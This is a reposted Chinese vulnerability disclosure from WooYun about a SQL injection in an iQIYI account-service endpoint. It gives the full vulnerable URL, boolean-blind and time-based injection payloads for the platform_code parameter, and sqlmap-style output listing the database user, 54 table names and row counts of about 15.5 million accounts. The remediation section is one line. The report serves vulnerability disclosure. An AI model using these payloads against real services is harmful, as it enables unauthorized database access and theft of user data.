神刀安全网

漏洞标题: 爱奇艺某站SQL注入(一千五百万数据)

漏洞详情

披露状态:

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经确认,细节仅向厂商公开
2016-04-09: 细节向核心白帽子及相关领域专家公开
2016-04-19: 细节向普通白帽子公开
2016-04-29: 细节向实习白帽子公开
2016-05-14: 细节向公众公开

简要描述:

我只是想缓存个电影出去玩的时候看
结果吓死本宝宝了

详细说明:

code 区域
http://account.iqiyi.com/services/account/info.action?version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6&mix=1&testMode=0

platform_code可以注入

code 区域
---
Parameter: platform_code (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6') AND 2143=2143 AND ('LHks'='LHks&mix=1&testMode=0

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6') AND SLEEP(5) AND ('xGQD'='xGQD&mix=1&testMode=0
---

漏洞证明:

先跑个user

code 区域
database management system users [1]:
[*] 'qiyiaccount'@'10.11.%'

再来个database

code 区域
Database: qiyi_account
[54 tables]
+---------------------------------+
| acc_auth_authority_resource |
| account_abnormal |
| account_account |
| account_account_ext |
| account_account_sub |
| account_account_sub_debug |
| account_appstore_recharge_count |
| account_async_task |
| account_async_task_processed |
| account_audit |
| account_auth_authority |
| account_auth_resource |
| account_auth_role |
| account_auth_role_authority |
| account_auth_user |
| account_auth_user_authority |
| account_auth_user_role |
| account_auto_renew |
| account_bi_uid |
| account_cash_coupon |
| account_cash_coupon_send |
| account_dict |
| account_dut_bind_log |
| account_dut_pay_type |
| account_dut_renew_log |
| account_dut_type |
| account_dut_user |
| account_exception_order |
| account_lock |
| account_log_operator |
| account_notify_log |
| account_order |
| account_recharge_access |
| account_recharge_access_channel |
| account_recharge_access_qd |
| account_recharge_channel |
| account_recharge_coins |
| account_recharge_platform |
| account_recharge_qd |
| account_recharge_rule |
| account_refund_order |
| account_security |
| account_security_level |
| account_security_message |
| account_settlement |
| account_split_coupon_user |
| account_sub_platform |
| account_sub_types |
| account_test_user |
| account_third_order |
| account_tracker_code |
| account_uid_change |
| account_wechat_info |
| boss_test_user |
+---------------------------------+

随便翻了几个表

code 区域
Database: qiyi_account
+------------------+---------+
| Table | Entries |
+------------------+---------+
| account_security | 624597 |
+------------------+---------+

Database: qiyi_account
+------------------+---------+
| Table | Entries |
+------------------+---------+
| account_dut_user | 15509726 |
+------------------+---------+

修复方案:

估计是拼接sql语句了吧

改代码吧

版权声明:转载请注明来源 Blcat@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 爱奇艺某站SQL注入(一千五百万数据)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址